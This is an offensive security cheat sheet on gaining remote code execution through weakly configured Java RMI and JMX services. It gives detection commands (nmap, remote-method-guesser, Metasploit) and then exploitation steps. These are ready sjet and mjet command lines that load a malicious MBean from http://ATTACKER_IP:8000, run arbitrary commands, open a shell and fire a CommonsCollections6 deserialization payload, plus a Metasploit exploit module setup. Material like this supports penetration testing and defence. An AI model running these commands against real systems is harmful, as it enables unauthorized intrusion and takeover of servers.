# Java RMI > Exposing a weak configured Java Remote Method Invocation (RMI) service can lead to several ways to achieve RCE. > One such attack is to host an MLet file and instruct the JMX service to load MBeans from the remote host which can be carried out > using the tools mjet or sjet. remote-method-guesser is a more recent tool which bundles enumeration of RMI services together > with a summary of currently known attack techniques. ## Summary * [Tools](#tools) * [Detection](#detection) * [Exploitation](#exploitation) * [RCE using sjet/mjet](#rce-using-sjet-or-mjet) * [References](#references) ## Tools - [sjet](https://github.com/siberas/sjet) - [mjet](https://github.com/mogwailabs/mjet) - [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser) ## Detection Using [nmap](https://nmap.org/): ```powershell $ nmap -sV --script "rmi-dumpregistry or rmi-vuln-classloader" -p TARGET_PORT TARGET_IP -Pn -v 1089/tcp open java-rmi Java RMI | rmi-vuln-classloader: | VULNERABLE: | RMI registry default configuration remote code execution vulnerability | State: VULNERABLE | Default configuration of RMI registry allows loading classes from remote URLs which can lead to remote code execution. | rmi-dumpregistry: | jmxrmi | javax.management.remote.rmi.RMIServerImpl_Stub ``` Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser): ```bash $ rmg scan --ports 0-65535 [+] Scanning 6225 Ports on for RMI services. [+] [+] [HIT] Found RMI service(s) on (DGC) [+] [HIT] Found RMI service(s) on (Registry, DGC) [+] [HIT] Found RMI service(s) on (Registry, Activator, DGC) [+] [6234 / 6234] [#############################] 100% [+] [+] Portscan finished. ``` ```bash $ rmg enum 9010 [+] RMI registry bound names: [+] [+] - plain-server2 [+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff7, 9040809218460289711] [+] - legacy-service [+] --> de.qtc.rmg.server.legacy.LegacyServiceImpl_Stub (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ffc, 4854919471498518309] [+] - plain-server [+] --> de.qtc.rmg.server.interfaces.IPlainServer (unknown class) [+] Endpoint: iinsecure.dev:39153 ObjID: [-af587e6:17d6f7bb318:-7ff8, 6721714394791464813] [...] ``` Using Metasploit ```bash use auxiliary/scanner/misc/java_rmi_server set RHOSTS <IPs> set RPORT <PORT> run ``` ## Exploitation ### RCE using sjet or mjet #### Requirements - Jython - The JMX server can connect to a http service that is controlled by the attacker - JMX authentication is not enabled #### Remote Command Execution The attack involves the following steps: * Starting a web server that hosts the MLet and a JAR file with the malicious MBeans * Creating a instance of the MBean javax.management.loading.MLet on the target server, using JMX * Invoking the "getMBeansFromURL" method of the MBean instance, passing the webserver URL as parameter. The JMX service will connect to the http server and parse the MLet file. * The JMX service downloads and loades the JAR files that were referenced in the MLet file, making the malicious MBean available over JMX. * The attacker finally invokes methods from the malicious MBean. Exploit the JMX using [sjet](https://github.com/siberas/sjet) or [mjet](https://github.com/mogwailabs/mjet) ```powershell jython sjet.py TARGET_IP TARGET_PORT super_secret install http://ATTACKER_IP:8000 8000 jython sjet.py TARGET_IP TARGET_PORT super_secret command "ls -la" jython sjet.py TARGET_IP TARGET_PORT super_secret shell jython sjet.py TARGET_IP TARGET_PORT super_secret password this-is-the-new-password jython sjet.py TARGET_IP TARGET_PORT super_secret uninstall jython mjet.py --jmxrole admin --jmxpassword adminpassword TARGET_IP TARGET_PORT deserialize CommonsCollections6 "touch /tmp/xxx" jython mjet.py TARGET_IP TARGET_PORT install super_secret http://ATTACKER_IP:8000 8000 jython mjet.py TARGET_IP TARGET_PORT command super_secret "whoami" jython mjet.py TARGET_IP TARGET_PORT command super_secret shell ``` ### RCE using Metasploit ```bash use exploit/multi/misc/java_rmi_server set RHOSTS <IPs> set RPORT <PORT> # configure also the payload if needed run ``` ## References * [ATTACKING RMI BASED JMX SERVICES - HANS-MARTIN MÜNCH, 28 April 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/) * [JMX RMI – MULTIPLE APPLICATIONS RCE - Red Timmy Security, 26 March 2019](https://www.exploit-db.com/docs/english/46607-jmx-rmi-–-multiple-applications-remote-code-execution.pdf) * [remote-method-guesser - BHUSA 2021 Arsenal - Tobias Neitzel, 15 August 2021](https://www.slideshare.net/TobiasNeitzel/remotemethodguesser-bhusa2021-arsenal)